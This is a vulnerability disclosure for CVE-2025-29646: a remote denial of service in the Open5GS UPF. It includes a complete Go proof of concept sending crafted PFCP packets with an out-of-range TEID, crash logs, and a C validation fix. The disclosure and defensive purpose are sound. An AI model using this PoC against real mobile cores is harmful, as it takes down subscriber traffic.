@scmdcs
Created June 14, 2025 11:07
CVE-2025-29646
[CVE ID]
CVE-2025-29646
------------------------------------------
[Description]
An issue in upf in open5gs 2.7.2 and earlier allows a remote attacker
to cause a Denial of Service via a crafted PFCP
SessionEstablishmentRequest packet with restoration indication = true
and (teid = 0 or teid >= ogs_pfcp_pdr_teid_pool.size).
------------------------------------------
[Vulnerability Type]
Other - CWE-404
------------------------------------------
[Vendor of Product]
open5gs
------------------------------------------
[Affected Product Code Base]
open5gs - 2.7.2
------------------------------------------
[Affected Component]
upf, open5gs-upfd
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Denial of Service]
true
------------------------------------------
[Attack Vectors]
The attacker must be able to send a crafted PFCP packet to the UPF.
------------------------------------------
[Reference]
https://github.com/open5gs/open5gs/issues/3747
------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]
true
------------------------------------------
[Discoverer]
Leonardo Sagratella, Lorenzo Cannella, Francesco D'Alterio

CVE-2025-29646

Vulnerable products

Open5GS UPF v2.7.2

Steps to reproduce

Sending a PFCP SessionEstablishmentRequest packet with restoration_indication = true and (teid = 0 or teid > ogs_pfcp_pdr_teid_pool.size) causes the UPF to hit an assertion at line 1365 of lib/pfcp/context.c and crash. The size of ogs_pfcp_pdr_teid_pool is max_ue * 4 * 16. Only the UPF needs to be running to reproduce the issue.

  1. start a new go project inside a new folder: go mod init ogs_poc
  2. create a main.go and paste the code below:
  3. download required libraries: go mod tidy
  4. run the program with the upf pfcp server address: go run main.go 10.22.77.2
package main
import (
	"flag"
	"fmt"
	"github.com/wmnsk/go-pfcp/ie"
	"github.com/wmnsk/go-pfcp/message"
	"log"
	"net"
)

func execPayload(host string) error {
	// random ip used as node id address
	var addr = "1.1.1.1"
	addrIp := net.ParseIP(addr)

	// create udp connection to upf
	conn, err := net.Dial("udp", host)
	if err != nil {
		return fmt.Errorf("net.Dial: %v", err)
	}
	defer conn.Close()

	// create NewAssociationSetupRequest
	asReq, _ := message.NewAssociationSetupRequest(
		0, ie.NewNodeID(addr, "", ""),
	).Marshal()

	// create NewSessionEstablishmentRequest
	seReq, _ := message.NewSessionEstablishmentRequest(0, 0, 0x0, 1, 0,
		ie.NewNodeID(addr, "", ""),
		ie.NewFSEID(0x0, addrIp, nil),
		ie.NewCreatePDR(
			ie.NewPDRID(0),
			ie.NewPDI(
				ie.NewSourceInterface(0),
				// teid = max_ue*4*16 + 1 (one past the pool, assuming max_ue = 1024); teid = 0 works too
				ie.NewFTEID(1, 1024*4*16+1, addrIp, nil, 0),
			)),
		// pfcpSEReq = 1 -> Restoration Indication = Present
		ie.NewPFCPSEReqFlags(1),
	).Marshal()

	// send association setup
	conn.Write(asReq)
	fmt.Printf("sent NewAssociationSetupRequest 0x%x\n", asReq)

	// send session establishment with payload
	conn.Write(seReq)
	fmt.Printf("sent NewSessionEstablishmentRequest 0x%x\n", seReq)

	return nil
}

func main() {

	var (
		port = flag.Int("p", 8805, "upf pfcp port")
	)
	flag.Parse()
	if len(flag.Args()) != 1 {
		log.Fatal("set pfcp upf host")
	}
	host := fmt.Sprintf("%v:%d", flag.Arg(0), *port)

	err := execPayload(host)
	if err != nil {
		log.Fatalf("execPayload: %v", err)
	}
}

Logs

Open5GS daemon v2.7.2

02/27 21:58:05.778: [app] INFO: Configuration: '/etc/open5gs/custom/upf.yaml' (../lib/app/ogs-init.c:144)
02/27 21:58:05.778: [app] INFO: File Logging: '/var/log/open5gs/upf.log' (../lib/app/ogs-init.c:147)
02/27 21:58:05.808: [pfcp] INFO: pfcp_server() [10.22.77.2]:8805 (../lib/pfcp/path.c:30)
02/27 21:58:05.808: [gtp] INFO: gtp_server() [10.66.55.2]:2152 (../lib/gtp/path.c:30)
02/27 21:58:05.808: [app] INFO: UPF initialize...done (../src/upf/app.c:31)
02/27 22:07:49.085: [upf] INFO: PFCP associated [1.1.1.1]:8805 [10.22.77.1]:42441 (../src/upf/pfcp-sm.c:168)
02/27 22:07:49.085: [upf] INFO: [Added] Number of UPF-Sessions is now 1 (../src/upf/context.c:209)
02/27 22:07:49.085: [pfcp] FATAL: ogs_pfcp_pdr_swap_teid: Assertion `pdr->f_teid.teid > 0 && pdr->f_teid.teid <= ogs_pfcp_pdr_teid_pool.size' failed. (../lib/pfcp/context.c:1365)
02/27 22:07:49.085: [core] FATAL: backtrace() returned 11 addresses (../lib/core/ogs-abort.c:37)
/usr/local/lib/libogspfcp.so.2(ogs_pfcp_pdr_swap_teid+0x181) [0x7c2429965355]
open5gs-upfd(+0x17837) [0x59f991074837]
open5gs-upfd(+0x102e5) [0x59f99106d2e5]
/usr/local/lib/libogscore.so.2(ogs_fsm_dispatch+0x119) [0x7c24299f9385]
open5gs-upfd(+0xeaf8) [0x59f99106baf8]
/usr/local/lib/libogscore.so.2(ogs_fsm_dispatch+0x119) [0x7c24299f9385]
open5gs-upfd(+0x7952) [0x59f991064952]
/usr/local/lib/libogscore.so.2(+0x119a3) [0x7c24299e99a3]
/lib/x86_64-linux-gnu/libc.so.6(+0x94ac3) [0x7c24293ebac3]
/lib/x86_64-linux-gnu/libc.so.6(+0x126850) [0x7c242947d850]
/usr/local/bin/entrypoint.sh: line 14:    24 Aborted                 (core dumped) open5gs-upfd "${@}"
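Added example (not Open5GS code, and not a claim about the upstream fix): the range check a hardened UPF can apply to the CP-supplied F-TEID on the restoration path, answering with a PFCP Cause instead of reaching the fatal assertion shown in the log at ../lib/pfcp/context.c:1365. Type and function names are hypothetical; the pool size follows the max_ue * 4 * 16 figure given above.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Illustrative types, not Open5GS's own: only the fields the check needs. */
struct teid_pool { uint32_t size; };    /* stands in for ogs_pfcp_pdr_teid_pool.size */
struct pdr_req {
    uint32_t teid;                      /* TEID from the F-TEID IE inside Create PDR / PDI */
    bool restoration_ind;               /* RESTI bit of PFCPSEReq-Flags */
};

/* Cause values from 3GPP TS 29.244 Table 8.2.1-1. */
enum pfcp_cause { CAUSE_REQUEST_ACCEPTED = 1, CAUSE_REQUEST_REJECTED = 64 };

/* Advisory: the pool holds max_ue * 4 * 16 entries. */
uint32_t teid_pool_size(uint32_t max_ue) { return max_ue * 4u * 16u; }

/* Same predicate the daemon asserts on (teid > 0 && teid <= pool size),
 * evaluated as input validation instead of as a fatal assertion. */
bool teid_in_pool(uint32_t teid, const struct teid_pool *pool) {
    return teid > 0 && teid <= pool->size;
}

/* Decide the Cause for a Session Establishment Request before any TEID swap.
 * Only the restoration path reaches the assertion in the advisory, so the
 * CP-supplied TEID is validated there; other paths are outside this check. */
enum pfcp_cause validate_pdr_teid(const struct pdr_req *pdr, const struct teid_pool *pool) {
    if (!pdr->restoration_ind)
        return CAUSE_REQUEST_ACCEPTED;
    if (!teid_in_pool(pdr->teid, pool))
        return CAUSE_REQUEST_REJECTED;  /* reject the session; do not abort the UPF */
    return CAUSE_REQUEST_ACCEPTED;
}

int main(void) {
    /* Constructed inputs mirroring the PoC: max_ue 1024 and TEID = pool size + 1. */
    struct teid_pool pool = { teid_pool_size(1024) };
    struct pdr_req probes[] = {
        { 1024u * 4u * 16u + 1u, true },    /* PoC value: one past the pool */
        { 0, true },                        /* TEID 0 */
        { 1, true },                        /* in range */
        { 0, false },                       /* no restoration flag: not this code path */
    };
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++)
        printf("teid=%u resti=%d -> cause %d\n", probes[i].teid,
               probes[i].restoration_ind, validate_pdr_teid(&probes[i], &pool));
    return 0;
}
```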